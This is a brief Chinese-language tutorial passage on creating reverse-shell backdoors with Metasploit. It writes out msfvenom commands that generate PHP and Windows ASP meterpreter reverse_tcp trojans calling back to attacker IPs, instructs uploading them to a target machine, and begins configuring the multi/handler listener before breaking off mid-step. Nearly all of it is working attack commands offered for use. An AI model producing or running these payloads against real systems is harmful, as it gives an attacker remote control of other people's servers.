一 建立反弹后门
msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php
注:生成的反弹木马存放在当前用户home目录下;
将生成的木马上传到目标机中,可以远程访问;
windows下asp反弹木马:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp
二 监听端口建立会话
1 使用handler模块
msf > use exploit/multi/handler
2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换